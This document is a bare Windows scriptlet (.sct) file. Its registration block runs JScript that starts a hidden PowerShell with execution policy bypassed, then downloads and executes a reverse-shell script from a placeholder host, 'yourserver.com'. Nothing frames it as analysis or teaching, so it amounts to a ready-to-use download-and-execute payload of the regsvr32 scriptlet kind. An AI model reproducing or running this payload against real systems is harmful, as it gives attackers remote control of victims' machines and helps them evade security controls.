<scriptlet>
  <registration>
    <script language="JScript">
      <![CDATA[
        var shell = new ActiveXObject("WScript.Shell");
        var exec = shell.Exec("cmd.exe /c powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('http://yourserver.com/reverse_shell.ps1')\"");
      ]]>
    </script>
  </registration>
</scriptlet>
